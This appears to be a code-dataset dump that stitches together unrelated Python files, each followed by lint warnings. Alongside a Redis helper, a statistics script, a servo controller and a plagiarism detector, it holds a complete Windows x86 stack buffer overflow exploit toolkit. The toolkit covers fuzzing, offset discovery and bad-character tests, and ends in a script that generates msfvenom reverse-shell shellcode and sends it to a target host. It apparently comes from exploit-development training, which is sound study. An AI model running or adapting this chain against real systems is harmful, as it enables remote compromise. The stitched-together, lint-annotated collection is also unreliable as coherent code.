16 def left_append(self, content):
17 # push value onto the left end of the list
18 return self.client.lpush(self.name, content)
19
20 def right_append(self, content):
21 # push value onto the right end of the list
22 return self.client.rpush(self.name, content)
23
24 def read(self, start=LEFTMOST, stop=RIGHTMOST):
25 # get the items in [start:stop]; by default returns the whole list
26 return self.client.lrange(self.name, start, stop)
27
28 def length(self):
29 # get the length of the list
30 return self.client.llen(self.name)
31
32 def clear(self):
33 # del is a Python keyword,
34 # so redis-py exposes the DEL command as delete
35 self.client.delete(self.name)
36
37 def keep(self, size):
38 # keep only the entries within the given range
39 self.client.ltrim(self.name, LEFTMOST, size-1)
40
41
42 if __name__ == '__main__':
43 import json
44 client = Redis(host='localhost', port=6379, db=0)
45 list_operate_client = RedisListSecondPack('SHOWPAYBIZ000001', client)
46 for x in range(4):
47 list_operate_client.left_append(json.dumps({'a': 'my %s data' % str(x)}))
48 print list_operate_client.read(), list_operate_client.length()
49 list_operate_client.keep(3)
50 print list_operate_client.read(), list_operate_client.length()
51 list_operate_client.clear()
52
53
54
55
| 48 - error: syntax-error
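The syntax-error label comes from the Python 2 print statements at lines 48 and 50. A sketch of the demo block ported to Python 3, reusing the class above and assuming a local Redis on the default port:

if __name__ == '__main__':
    import json
    client = Redis(host='localhost', port=6379, db=0)
    list_operate_client = RedisListSecondPack('SHOWPAYBIZ000001', client)
    for x in range(4):
        list_operate_client.left_append(json.dumps({'a': 'my %s data' % x}))
    print(list_operate_client.read(), list_operate_client.length())
    list_operate_client.keep(3)
    print(list_operate_client.read(), list_operate_client.length())
    list_operate_client.clear()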
|
1 import plotly.figure_factory as ff
2 import pandas as pd
3 import csv
4 import statistics
5 import random
6 import plotly.graph_objects as go
7
8 df = pd.read_csv("StudentsPerformance.csv")
9 data = df["mathscore"].tolist()
10 """ fig = ff.create_distplot([data], ["Math Scores"], show_hist=False)
11 fig.show() """
12
13 P_mean = statistics.mean(data)
14 P_stdev = statistics.stdev(data)
15
16 print("Mean of the Population: ", P_mean)
17 print("Standard Deviation of the Population: ", P_stdev)
18
19 def randomSetOfMeans(counter):
20 dataSet = []
21 for i in range (0, counter):
22 randomIndex = random.randint(0, len(data) - 1)
23 value = data[randomIndex]
24 dataSet.append(value)
25
26 mean = statistics.mean(dataSet)
27 return(mean)
28
29 meanList = []
30 for i in range (0,100):
31 setOfMeans = randomSetOfMeans(30)
32 meanList.append(setOfMeans)
33
34 S_mean = statistics.mean(meanList)
35 S_stdev = statistics.stdev(meanList)
36
37 print("Mean of the Sample: ", S_mean)
38 print("Standard Deviation of the Sample: ", S_stdev)
39
40 first_stdev_start, first_stdev_end = P_mean - P_stdev, P_mean + P_stdev
41 second_stdev_start, second_stdev_end = P_mean - (2*P_stdev), P_mean + (2*P_stdev)
42 third_stdev_start, third_stdev_end = P_mean - (3*P_stdev), P_mean + (3*P_stdev)
43
44 fig = ff.create_distplot([meanList], ["Math Scores"], show_hist=False)
45 fig.add_trace(go.Scatter(x=[P_mean, P_mean], y=[0, 0.17], mode="lines", name="MEAN"))
46 fig.add_trace(go.Scatter(x=[first_stdev_start, first_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1"))
47 fig.add_trace(go.Scatter(x=[first_stdev_end, first_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1"))
48 fig.add_trace(go.Scatter(x=[second_stdev_start, second_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2"))
49 fig.add_trace(go.Scatter(x=[second_stdev_end, second_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2"))
50 fig.add_trace(go.Scatter(x=[third_stdev_start, third_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3"))
51 fig.add_trace(go.Scatter(x=[third_stdev_end, third_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3"))
52
53 #First Intervention Data Analysis
54
55 df_1 = pd.read_csv("Inter1.csv")
56 data_1 = df_1["mathscore"].tolist()
57 meanOfSample1 = statistics.mean(data_1)
58 print("Mean of Sample 1: ", meanOfSample1)
59 fig.add_trace(go.Scatter(x=[meanOfSample1, meanOfSample1], y=[0, 0.17], mode="lines", name="Mean of Sample 1"))
60
61 #Third Intervention Data Analysis
62
63 df_3 = pd.read_csv("Inter3.csv")
64 data_3 = df_3["mathscore"].tolist()
65 meanOfSample3 = statistics.mean(data_3)
66 print("Mean of Sample 3: ", meanOfSample3)
67 fig.add_trace(go.Scatter(x=[meanOfSample3, meanOfSample3], y=[0, 0.17], mode="lines", name="Mean of Sample 3"))
68
69 fig.show()
70
71 #Z-Score
72 ZScore = (meanOfSample1-P_mean)/P_stdev
73 print("Z-Score 1: ", ZScore)
74 ZScore3 = (meanOfSample3-P_mean)/P_stdev
75 print("Z-Score 3: ", ZScore3)
| 21 - warning: redefined-outer-name
21 - warning: unused-variable
3 - warning: unused-import
|
1 #!/usr/bin/env python
2
3 # Used to test bad characters as part of the process in developing a
4 # Windows x86 reverse shell stack buffer overflow
5 # Saved Return Pointer overwrite exploit.
6 # Parameters are saved in params.py for persistence.
7 # Delete params.py and params.pyc to reset them; or simply edit params.py
8 #
9 # Written by y0k3L
10 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
11 # https://github.com/justinsteven/dostackbufferoverflowgood
12
13 import functions, argparse
14
15 # get parameters
16 RHOST = functions.getRhost()
17 RPORT = functions.getRport()
18 buf_totlen = functions.getBufTotlen()
19 offset_srp = functions.getOffsetSrp()
20
21 print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s" % (RHOST, RPORT, buf_totlen, offset_srp)
22
23 parser = argparse.ArgumentParser()
24 parser.add_argument("-b", help="Bad characters in hex format, no spaces, eg. 0x0A,0x7B", dest='additional_bchars', nargs='+')
25
26 args = parser.parse_args()
27
28 print "Additional bad chars =", str(args.additional_bchars)
29
30 badchar_test = "" # start with an empty string
31 badchars = [0x00, 0x0A] # we've reasoned that these are definitely bad
32
33 if args.additional_bchars is not None:
34
35 extras = args.additional_bchars[0].split(",") # split out by comma delimiter
36
37 for i in range(0, len(extras)):
38 extras[i] = int(extras[i], 16) # convert from str to hex int
39 badchars.append(extras[i]) # append bad char to badchars list
40
41 # remove any duplicates
42 badchars = list(dict.fromkeys(badchars))
43
44 print "badchars =", [hex(x) for x in badchars]
45
46 # TODO check to see if badchars already exists...
47 functions.writeParamToFile("badchars", badchars)
48
49 # generate the string
50 for i in range(0x00, 0xFF+1): # range(0x00, 0xFF) only returns up to 0xFE
51 if i not in badchars: # skip the badchars
52 badchar_test += chr(i) # append each non-badchar to the string
53
54 try:
55 # open a file for writing ("w") the string as binary ("b") data
56 with open("badchar_test.bin", "wb") as f:
57 f.write(badchar_test)
58 except:
59 print "Error when writing to file. Quitting..."
60 quit()
61
62 buf = ""
63 buf += "A" * (offset_srp - len(buf)) # padding
64 buf += "BBBB" # SRP overwrite
65 buf += badchar_test # ESP points here
66 buf += "D" * (buf_totlen - len(buf)) # trailing padding
67 buf += "\n"
68
69 # print buf
70
71 sent = functions.sendBuffer(RHOST, RPORT, buf)
72
73 if sent == 0:
74 print "\nSet up mona byte array as follows:"
75 print "!mona bytearray -cpb \"\\x00\\x0a<other bad chars>\"\n"
76 print "Use \"!mona cmp -a esp -f C:\\path\\bytearray.bin\" to check bad chars."
77 print "Then run \"!mona jmp -r esp -cpb \"\\x00\\x0a<other bad chars>\" to search for \"jmp esp\" memory addresses."
78 print "\nAlso try \"!mona modules\" to find an unprotected module, followed by"
79 print "\"!mona find -s \"\\xff\\xe4\" -cpb \"\\x00\\x0a<other bad chars>\" -m <module_name>\""
80 print "\nEnter discovered jmp esp (or \\xff\\xe4) memory address at next step."
| 21 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 # Used to confirm that the suspected offset is indeed correct. This is part of
4 # the process in developing a Windows x86 reverse shell stack buffer overflow
5 # Saved Return Pointer overwrite exploit.
6 # Parameters are saved in params.py for persistence.
7 # Delete params.py and params.pyc to reset them; or simply edit params.py
8 #
9 # Written by y0k3L
10 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
11 # https://github.com/justinsteven/dostackbufferoverflowgood
12
13 import functions, os
14
15 # get parameters
16 RHOST = functions.getRhost()
17 RPORT = functions.getRport()
18 buf_totlen = functions.getBufTotlen()
19 offset_srp = functions.getOffsetSrp()
20
21 if offset_srp > buf_totlen-300:
22 print "Warning: offset is close to max buffer length. Recommend increasing "
23 print "max buffer length (buf_totlen)"
24
25 print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s" % (RHOST, RPORT, buf_totlen, offset_srp)
26
27 buf = ""
28 buf += "A" * (offset_srp - len(buf)) # padding
29 buf += "BBBB" # SRP overwrite
30 buf += "CCCC" # ESP should end up pointing here
31 buf += "D" * (buf_totlen - len(buf)) # trailing padding
32 buf += "\n"
33
34 # print buf
35
36 sent = functions.sendBuffer(RHOST, RPORT, buf)
37
38 if sent == 0:
39 print "Confirm that EBP is all 0x41's, EIP is all 0x42's, and ESP points "
40 print "to four 0x43's followed by many 0x44's"
| 22 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 # Uses a software interrupt to test the jmp esp functionality as part of the
4 # process in developing a Windows x86 reverse shell stack buffer overflow
5 # Saved Return Pointer overwrite exploit.
6 # Parameters are saved in params.py for persistence.
7 # Delete params.py and params.pyc to reset them; or simply edit params.py
8 #
9 # Written by y0k3L
10 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
11 # https://github.com/justinsteven/dostackbufferoverflowgood
12
13 import struct, functions
14
15 # get parameters
16 RHOST = functions.getRhost()
17 RPORT = functions.getRport()
18 buf_totlen = functions.getBufTotlen()
19 offset_srp = functions.getOffsetSrp()
20 ptr_jmp_esp = functions.getPtrJmpEsp()
21
22 print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s; ptr_jmp_esp=%s" % (RHOST, RPORT, buf_totlen, offset_srp, hex(ptr_jmp_esp))
23
24 buf = ""
25 buf += "A" * (offset_srp - len(buf)) # padding
26 buf += struct.pack("<I", ptr_jmp_esp) # SRP overwrite. Converts to little endian
27 buf += "\xCC\xCC\xCC\xCC" # ESP points here
28 buf += "D" * (buf_totlen - len(buf)) # trailing padding
29 buf += "\n"
30
31 # print buf
32
33 sent = functions.sendBuffer(RHOST, RPORT, buf)
34
35 if sent == 0:
36 print "Caught software interrupt?"
| 22 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 # Windows x86 reverse shell stack buffer overflow
4 # Saved Return Pointer overwrite exploit.
5 # Parameters are saved in params.py for persistence.
6 # Delete params.py and params.pyc to reset them; or simply edit params.py
7 #
8 # Written by y0k3L
9 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
10 # https://github.com/justinsteven/dostackbufferoverflowgood
11
12 import struct, functions, subprocess
13
14 # get parameters
15 RHOST = functions.getRhost()
16 RPORT = functions.getRport()
17 buf_totlen = functions.getBufTotlen()
18 offset_srp = functions.getOffsetSrp()
19 ptr_jmp_esp = functions.getPtrJmpEsp()
20 LHOST = functions.getLhost()
21 LPORT = functions.getLport()
22
23 print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s; ptr_jmp_esp=%s" % (RHOST, RPORT, buf_totlen, offset_srp, hex(ptr_jmp_esp))
24
25 # instead of using NOPs, drag ESP up the stack to avoid GetPC issues
26 # note: when modifying ESP, always ensure that it remains divisible by 4
27 sub_esp_10 = "\x83\xec\x10"
28
29 LHOSTstr = "LHOST=" + LHOST
30 LPORTstr = "LPORT=" + str(LPORT)
31
32 # import shellcode from shellcode.py; or create shellcode if not exists
33 try:
34 import shellcode
35 print "shellcode.py already exists - using that shellcode..."
36 except:
37 badchars = [struct.pack("B", x).encode("hex") for x in functions.getBadChars()]
38 # print badchars
39 for x in range(0, len(badchars)):
40 badchars[x] = '\\x' + badchars[x]
41 # print a[x]
42 # print badchars
43
44 badcharsstr = "'" + ''.join(badchars) + "'"
45 print "badcharsstr =", badcharsstr
46
47 cmd = ["msfvenom", "-p", "windows/shell_reverse_tcp", LHOSTstr, LPORTstr, "EXITFUNC=thread", "-v", "shellcode", "-b", badcharsstr, "-f", "python", "-o", "shellcode.py"]
48
49 print ' '.join(cmd)
50
51 try:
52 subprocess.check_output(cmd)
53 import shellcode
54
55 except:
56 print "Error generating shellcode :("
57 exit()
58
59 buf = ""
60 buf += "A" * (offset_srp - len(buf)) # padding
61 buf += struct.pack("<I", ptr_jmp_esp) # SRP overwrite
62 buf += sub_esp_10 # ESP points here
63 buf += shellcode.shellcode
64 buf += "D" * (buf_totlen - len(buf)) # trailing padding
65 buf += "\n"
66
67 # print buf.encode("hex")
68
69 sent = functions.sendBuffer(RHOST, RPORT, buf)
70
71 if sent == 0:
72 print "Caught reverse shell?"
| 23 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 import socket, argparse
4
5 parser = argparse.ArgumentParser()
6 parser.add_argument("RHOST", help="Remote host IP")
7 parser.add_argument("RPORT", help="Remote host port", type=int)
8 parser.add_argument("-l", help="Max buffer length in bytes; default 1024", type=int, default=1024, dest='buf_len')
9
10 args = parser.parse_args()
11
12 buf = "A" * args.buf_len + "\n"
13
14 print buf
15
16 print "Attempting to connect to service..."
17
18 try:
19 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
20 s.settimeout(5)
21 s.connect((args.RHOST, args.RPORT))
22
23 print "Sending %s A's..." % args.buf_len
24 s.send(buf)
25
26 print "%s A's sent." % args.buf_len
27
28 except:
29 print "Error connecting to service..."
| 14 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 import socket, argparse, time
4
5 parser = argparse.ArgumentParser()
6 parser.add_argument("RHOST", help="Remote host IP")
7 parser.add_argument("RPORT", help="Remote host port", type=int)
8 parser.add_argument("-l", help="Max number of bytes to send; default 1000", type=int, default=1000, dest='max_num_bytes')
9
10 args = parser.parse_args()
11
12 for i in range(100, args.max_num_bytes+1, 100):
13 buf = "A" * i
14 print "Fuzzing service with %s bytes" % i
15
16 try:
17 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
18 s.settimeout(5)
19 s.connect((args.RHOST, args.RPORT))
20
21 s.send(buf + '\n')
22 s.recv(1024)
23 s.close()
24
25 time.sleep(0.5)
26
27 except:
28 print "Error connecting to service..."
29 if len(buf) > 100:
30 print "Crash occurred with buffer length: " + str(len(buf))
31 exit()
| 14 - error: syntax-error
|
1 # Functions supporting a Windows x86 reverse shell stack buffer overflow
2 # Saved Return Pointer overwrite exploit.
3 # Parameters are saved in params.py for persistence.
4 # Delete params.py and params.pyc to reset them; or simply edit params.py
5 #
6 # Written by y0k3L
7 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
8 # https://github.com/justinsteven/dostackbufferoverflowgood
9
10 import socket, struct
11
12 # import params from params.py; or create an empty file if not exists
13 try:
14 import params
15 except:
16 open('params.py', 'a').close()
17 print "params.py created for parameter persistence."
18
19 # write parameter to file for persistence
20 def writeParamToFile(param_name, param_value):
21 with open("params.py", "a") as f:
22 f.write("%s = %s\n" % (param_name, param_value))
23
24 # return remote host (target) IP address
25 def getRhost():
26 try:
27 return params.RHOST
28 except:
29 RHOST = raw_input("RHOST: ")
30 writeParamToFile("RHOST", '\"' + RHOST + '\"')
31 return RHOST
32
33 # return remote host (target) port
34 def getRport():
35 try:
36 return params.RPORT
37 except:
38 RPORT = raw_input("RPORT: ")
39 writeParamToFile("RPORT", RPORT)
40 return int(RPORT)
41
42 # return local host (listening) IP address
43 def getLhost():
44 try:
45 return params.LHOST
46 except:
47 LHOST = raw_input("LHOST: ")
48 writeParamToFile("LHOST", '\"' + LHOST + '\"')
49 return LHOST
50
51 # return local host (listening) port
52 def getLport():
53 try:
54 return params.LPORT
55 except:
56 LPORT = raw_input("LPORT: ")
57 writeParamToFile("LPORT", LPORT)
58 return int(LPORT)
59
60 # return max buffer length
61 def getBufTotlen():
62 try:
63 return params.buf_totlen
64 except:
65 buf_totlen = raw_input("Max buffer length: ")
66 writeParamToFile("buf_totlen", buf_totlen)
67 return int(buf_totlen)
68
69 # return Saved Return Pointer offset
70 def getOffsetSrp():
71 try:
72 return params.offset_srp
73 except:
74 offset_srp = raw_input("offset_srp: ")
75 writeParamToFile("offset_srp", offset_srp)
76 return int(offset_srp)
77
78 # return pointer address to jmp esp
79 def getPtrJmpEsp():
80 try:
81 return params.ptr_jmp_esp
82 except:
83 ptr_jmp_esp = raw_input("ptr_jmp_esp: ")
84 writeParamToFile("ptr_jmp_esp", ptr_jmp_esp)
85 return int(ptr_jmp_esp, 16)
86
87 # return bad characters
88 def getBadChars():
89 try:
90 # return [hex(x) for x in params.badchars]
91 return params.badchars
92 except:
93 chars = raw_input("Enter bad characters in hex format, no spaces, eg. 0x0A,0x7B: ")
94 chars = chars.split(",") # split out by comma delimiter; avoid shadowing the input builtin
95
96 badchars = []
97
98 for i in range(0, len(chars)):
99 chars[i] = int(chars[i], 16) # convert from str to hex int
100 badchars.append(chars[i]) # append bad char to badchars list
101
102 # remove any duplicates
103 badchars = list(dict.fromkeys(badchars))
104
105 # writeParamToFile("badchars", '\"' + badchars + '\"')
106 writeParamToFile("badchars", badchars)
107 return badchars
108
109 # connect to remote host (target) and send buffer
110 # return 0 for success; return 1 for failure
111 def sendBuffer(RHOST, RPORT, buf):
112 print "Attempting to connect to service..."
113
114 try:
115 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
116 s.settimeout(5)
117 s.connect((RHOST, RPORT))
118
119 print "Sending buffer..."
120 # this part may need to be modified depending on which command is vulnerable in the target service
121 s.send(buf)
122 s.close()
123
124 print "Buffer sent."
125
126 return 0
127
128 except:
129 print "Error connecting to service..."
130
131 return 1
132
133 # return unique pattern of desired length
134 def pattern_create(length):
135 pattern = ''
136 parts = ['A', 'a', '0']
137 while len(pattern) != length:
138 pattern += parts[len(pattern) % 3]
139 if len(pattern) % 3 == 0:
140 parts[2] = chr(ord(parts[2]) + 1)
141 if parts[2] > '9':
142 parts[2] = '0'
143 parts[1] = chr(ord(parts[1]) + 1)
144 if parts[1] > 'z':
145 parts[1] = 'a'
146 parts[0] = chr(ord(parts[0]) + 1)
147 if parts[0] > 'Z':
148 parts[0] = 'A'
149 return pattern
150
151 # return pattern offset given a unique pattern and value to search for
152 def pattern_offset(value, pattern):
153 value = struct.pack('<I', int(value, 16)).strip('\x00')
154 print "value =", value
155 try:
156 return pattern.index(value)
157 except ValueError:
158 print "Pattern not found..."
159 return "Not found"
| 17 - error: syntax-error
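pattern_create builds the classic cyclic pattern (Aa0Aa1Aa2...), in which any four-byte window is unique, so an EIP value read from a debugger maps back to exactly one offset. A Python 3 sketch of the pair under that assumption, including the bytes handling pattern_offset needs:

import struct

def pattern_create(length):
    pattern, parts = '', ['A', 'a', '0']
    while len(pattern) != length:
        pattern += parts[len(pattern) % 3]
        if len(pattern) % 3 == 0:
            parts[2] = chr(ord(parts[2]) + 1)
            if parts[2] > '9':
                parts[2] = '0'
                parts[1] = chr(ord(parts[1]) + 1)
            if parts[1] > 'z':
                parts[1] = 'a'
                parts[0] = chr(ord(parts[0]) + 1)
            if parts[0] > 'Z':
                parts[0] = 'A'
    return pattern

def pattern_offset(value, pattern):
    # value is the EIP as hex text, e.g. '41326341'; unpack little-endian
    needle = struct.pack('<I', int(value, 16)).decode('latin-1')
    try:
        return pattern.index(needle)
    except ValueError:
        return None

print(pattern_offset('41326341', pattern_create(200)))  # -> 66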
|
1 #!/usr/bin/env python
2
3 # Generates and sends a unique pattern to a service as part of the process in
4 # developing a Windows x86 reverse shell stack buffer overflow
5 # Saved Return Pointer overwrite exploit.
6 # Parameters are saved in params.py for persistence.
7 # Delete params.py and params.pyc to reset them; or simply edit params.py
8 #
9 # Written by y0k3L
10 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
11 # https://github.com/justinsteven/dostackbufferoverflowgood
12
13 import functions
14
15 # get parameters
16 RHOST = functions.getRhost()
17 RPORT = functions.getRport()
18 buf_totlen = functions.getBufTotlen()
19
20 print "RHOST=%s; RPORT=%s; buf_totlen=%s" % (RHOST, RPORT, buf_totlen)
21
22 pattern = functions.pattern_create(buf_totlen)
23 pattern += '\n'
24 print pattern
25
26 sent = functions.sendBuffer(RHOST, RPORT, pattern)
27
28 if sent == 0:
29 print "EIP should now be overwritten."
30 eip_value = raw_input("EIP value: ")
31 offset_srp = functions.pattern_offset(eip_value, pattern)
32 print "offset_srp =", offset_srp
33 if "offset_srp" in open("params.py", "r").read() and offset_srp != functions.getOffsetSrp():
34 print "Something went wrong...offset_srp is already defined in params.py as %s" % functions.getOffsetSrp()
35 elif isinstance(offset_srp, int):
36 functions.writeParamToFile("offset_srp", offset_srp)
37 else:
38 print "Error: offset could not be found."
| 20 - error: syntax-error
|
1 from __future__ import division
2 import time
3 import pygame
4 from adafruit_servokit import ServoKit
5 pygame.init()
6
7
8
9 pwm = ServoKit(channels=16)
10 leftstick = 0.07
11 rightstick = 0.07
12 liftUP = 0.00
13 liftDOWN = 0.00
14 print('Initialized')
15
16
17 gamepad = pygame.joystick.Joystick(0)
18 gamepad.init()
19
20 while True:
21
22 pygame.event.get()
23
24 if abs(gamepad.get_axis(1)) <= 0.1:
25 leftstick = 0.1
26
27 elif abs(gamepad.get_axis(4)) <= 0.1:
28 rightstick = 0.1
29
30 elif abs(gamepad.get_button(3)) <= 0.1:
31 liftUP = 0.1
32
33 elif abs(gamepad.get_button(0)) <= 0.1:
34 liftDOWN = 0.1
35
36
37 leftstick = gamepad.get_axis(1)
38 rightstick = gamepad.get_axis(4)
39 liftUP = gamepad.get_button(3)
40 liftDOWN = -gamepad.get_button(0)
41
42
43 pwm.continuous_servo[1].throttle = leftstick
44 pwm.continuous_servo[4].throttle = rightstick
45 # combine the two commands: writing channel 11 twice would let liftDOWN clobber liftUP
46 pwm.continuous_servo[11].throttle = liftUP + liftDOWN
47
48 print("rightstick: ", rightstick)
49
50 print("leftstick: ", leftstick)
51
52 print("lift: ", liftUP)
53
54 print("lift: ", liftDOWN)
55
56
57 #axis 0 = A
58 #axis 3 = Y | 2 - warning: unused-import
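The elif chain in the loop assigns deadzone fallbacks that the unconditional reads a few lines later immediately overwrite, so it currently has no effect. A sketch of a deadzone helper capturing what that chain presumably intends (the 0.1 threshold is taken from the original; zeroing inside the deadzone is an assumption):

def deadzone(value, threshold=0.1):
    # suppress stick jitter near the centre position
    return 0.0 if abs(value) <= threshold else value

# usage sketch: leftstick = deadzone(gamepad.get_axis(1))
print(deadzone(0.05), deadzone(0.6))  # -> 0.0 0.6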
|
1 from Preprocessing.cleantext import *
2
3 class Gram:
4 def __init__(self, text, hash_gram, start_pos, end_pos):
5 self.text = text
6 self.hash = hash_gram
7 self.start_pos = start_pos
8 self.end_pos = end_pos
9
10
11 def get_text_from_file(filename):
12 with open(filename, 'r') as f:
13 text = f.read().lower()
14 return text
15
16 def get_text_processing(text):
17 stop_symbols = [' ', ',']
18 return ''.join(j for j in text if j not in stop_symbols)
19
20 def get_hash_from_gram(gram, q):
21 h = 0
22 k = len(gram)
23 for char in gram:
24 x = int(ord(char)-ord('a') + 1)
25 h = (h * k + x) % q
26 return h
27
28 def get_k_grams_from_text(text, k = 25, q = 31):
29 grams = []
30 for i in range(0, len(text)-k+1):
31 hash_gram = get_hash_from_gram(text[i:i+k], q)
32 gram = Gram(text[i:i+k], hash_gram, i, i+k)
33 grams.append(gram)
34 return grams
35
36
37 def get_hashes_from_grams(grams):
38 hashes = []
39 for gram in grams:
40 hashes.append(gram.hash)
41 return hashes
42
43 def min_index(window):
44 min_ = window[0]
45 min_i = 0
46 for i in range(len(window)):
47 if window[i] < min_:
48 min_ = window[i]
49 min_i = i
50 return min_i
51
52 def winnow(hashes, w):
53 n = len(hashes)
54 prints = []
55 windows = []
56 prev_min = 0
57 current_min = 0
58 for i in range(n - w):
59 window = hashes[i:i+w]
60 windows.append(window)
61 current_min = i + min_index(window)
62 if not current_min == prev_min:
63 prints.append(hashes[current_min])
64 prev_min = current_min
65 return prints
66
67 def get_points(fp1, fp2, token, hashes, grams):
68 points = []
69 for i in fp1:
70 for j in fp2:
71 if i == j:
72 flag = 0
73 startx = endx = None
74 match = hashes.index(i)
75 newStart = grams[match].start_pos
76 newEnd = grams[match].end_pos
77
78 for k in token:
79 if k[2] == newStart:
80 startx = k[1]
81 flag = 1
82 if k[2] == newEnd:
83 endx = k[1]
84 if flag == 1 and endx != None:
85 points.append([startx, endx])
86 points.sort(key = lambda x: x[0])
87 points = points[1:]
88 return points
89
90 def get_merged_points(points):
91 mergedPoints = []
92 mergedPoints.append(points[0])
93 for i in range(1, len(points)):
94 last = mergedPoints[len(mergedPoints) - 1]
95 if points[i][0] >= last[0] and points[i][0] <= last[1]:
96 if points[i][1] > last[1]:
97 mergedPoints = mergedPoints[: len(mergedPoints)-1]
98 mergedPoints.append([last[0], points[i][1]])
99 else:
100 pass
101 else:
102 mergedPoints.append(points[i])
103 return mergedPoints
104
105 def get_fingerprints(file1, file2, k, q, w):
106
107 token1 = tokenize(file1)
108 token2 = tokenize(file2)
109
110 text1proc = toText(token1)
111 text2proc = toText(token2)
112
113 grams1 = get_k_grams_from_text(text1proc, k, q)
114 grams2 = get_k_grams_from_text(text2proc, k, q)
115
116 hashes1 = get_hashes_from_grams(grams1)
117 hashes2 = get_hashes_from_grams(grams2)
118
119 fp1 = winnow(hashes1, w)
120 fp2 = winnow(hashes2, w)
121
122 points1 = get_points(fp1, fp2, token1, hashes1, grams1)
123 points2 = get_points(fp1, fp2, token2, hashes2, grams2)
124
125 merged_points1 = get_merged_points(points1)
126 merged_points2 = get_merged_points(points2)
127 return (merged_points1, merged_points2)
128
| 1 - warning: wildcard-import
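The wildcard-import warning and the four undefined-variable errors resolve together: naming the symbols the module actually calls lets pylint see where tokenize and toText come from (assuming Preprocessing.cleantext exports those two names, as the call sites imply):

from Preprocessing.cleantext import tokenize, toText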
3 - refactor: too-few-public-methods
12 - warning: unspecified-encoding
105 - refactor: too-many-locals
107 - error: undefined-variable
108 - error: undefined-variable
110 - error: undefined-variable
111 - error: undefined-variable
|
1 from Algorithms.Winnowing import get_fingerprints, get_text_from_file
2 from tkinter import *
3 from tkinter import filedialog as fd
4 import locale
5
6 k = 15
7 q = 259
8 w = 4
9
10 class PlagiarismDetect(Frame):
11
12 def __init__(self, parent):
13 Frame.__init__(self, parent, background="white")
14
15 self.parent = parent
16 self.width = self.winfo_screenwidth()
17 self.height = self.winfo_screenheight()
18
19 self.parent.title("DetectPlagiarismMoss")
20 self.pack(fill=BOTH, expand=True)
21
22 self.file1 = 'file1'
23 self.file2 = 'file2'
24
25 self.create_main_menu()
26
27 def choice_f1(self):
28 self.file1 = fd.askopenfilename(defaultextension='.cpp', filetypes=[('CPP', '.cpp'),('TXT', '.txt'), ('Py', '.py')])
29 self.text_info_menu['text'] = "Load\n {}\n {}:".format(self.file1, self.file2)
30
31 def choice_f2(self):
32 self.file2 = fd.askopenfilename(defaultextension='.cpp', filetypes=[('CPP', '.cpp'),('TXT', '.txt'),('Py', '.py')])
33 self.text_info_menu['text'] = "Load\n {}\n {}:".format(self.file1, self.file2)
34
35 def print_file1(self,text, points, side):
36 newCode = text[: points[0][0]]
37 if side == 0:
38 textfield = self.text1
39 else:
40 textfield = self.text2
41 textfield.insert('end', newCode)
42 plagCount = 0
43 for i in range(len(points)):
44 if points[i][1] > points[i][0]:
45 plagCount += points[i][1] - points[i][0]
46 newCode = newCode + text[points[i][0] : points[i][1]]
47 textfield.insert('end', text[points[i][0] : points[i][1]], 'warning')
48 if i < len(points) - 1:
49 newCode = newCode + text[points[i][1] : points[i+1][0]]
50 textfield.insert('end', text[points[i][1] : points[i+1][0]])
51 else:
52 newCode = newCode + text[points[i][1] :]
53 textfield.insert('end', text[points[i][1] :])
54 return plagCount / len(text)
55
56 def analyze(self):
57 self.text1.tag_config('warning', background="orange",)
58 self.text2.tag_config('warning', background="orange")
59 text1 = get_text_from_file(self.file1)
60 text2 = get_text_from_file(self.file2)
61
62 mergedPoints = get_fingerprints(self.file1, self.file2, k, q, w)
63 res = self.print_file1(text1, mergedPoints[0], 0)
64 res1 = self.print_file1(text2, mergedPoints[1], 1)
65 self.text_plagiarism['text'] = "File uniqueness: {} : {}%\nFile uniqueness: {} : {}%".format(self.file1.split('/')[-1], int((1-res)*100), self.file2.split('/')[-1], int((1-res1)*100))
66
67
68
69 def create_main_menu(self):
70 frame1 = Frame(self)
71 frame1.pack(fill=X)
72 frame1.config(bg="white")
73 self.text_info_menu = Label(frame1, text="Загрузите \n{} \n{}:".format(self.file1, self.file2), font=("Arial Bold", 20))
74 self.text_info_menu.config(bg="white")
75 self.text_info_menu.pack()
76
77 self.text_plagiarism = Label(frame1, text="Уникальность файла: {} : {}%\nУникальность файла: {} : {}%".format("",0, "", 0), font=("Arial Bold", 20))
78 self.text_plagiarism.config(bg="white")
79 self.text_plagiarism.pack()
80 choice_file2 = Button(frame1, text="Файл №2", command=self.choice_f2)
81 choice_file2.pack(side=RIGHT, expand=True)
82 choice_file1 = Button(frame1, text="Файл №1", command=self.choice_f1)
83 choice_file1.pack(side=RIGHT, expand=True)
84
85 frame2 = Frame(self)
86 frame2.pack(fill=X)
87 frame2.config(bg="white")
88 analyze = Button(frame2, text="Обработать", command=self.analyze)
89 analyze.pack()
90
91 frame3 = Frame(self)
92 frame3.pack(fill=X)
93 frame3.config(bg="white")
94 self.text1 = Text(frame3, width=int(100), height=int(100))
95 self.text1.pack(side=LEFT)
96 self.text2 = Text(frame3, width=int(100), height=int(100))
97 self.text2.pack(side=LEFT)
98
99
100
101
102 def main():
103 locale.setlocale(locale.LC_ALL, 'ru_RU.UTF8')
